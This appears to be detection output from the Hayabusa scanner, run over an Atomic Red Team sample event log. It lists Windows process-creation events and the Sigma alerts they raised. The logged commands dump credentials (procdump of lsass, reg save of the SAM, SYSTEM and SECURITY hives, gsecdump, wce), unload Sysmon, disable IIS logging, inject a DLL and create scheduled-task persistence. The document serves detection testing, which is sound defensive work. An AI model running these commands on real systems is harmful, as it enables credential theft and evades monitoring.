+2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe  /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp  -decode c:\file.exe file.txt  :  Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd.exe  /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll  :  Path: C:\Windows\System32\mavinject.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT  :  Command: at  13:20 /interactive cmd  :  Path: C:\Windows\System32\at.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: SCHTASKS  /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: SCHTASKS  /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe  -a -c  :  Path: C:\Windows\System32\pcalua.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe  -a Java  :  Path: C:\Windows\System32\pcalua.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe  -a C:\Windows\system32\javacpl.cpl  :  Path: C:\Windows\System32\pcalua.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe  :  Path: C:\Windows\System32\forfiles.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe""  :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles  /p c:\windows\system32 /m notepad.exe /c  c:\folder\normal.dll:evil.exe  :  Path: C:\Windows\System32\forfiles.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user  :  Path: C:\Windows\System32\whoami.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\sam sam  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\system system  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\security security  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
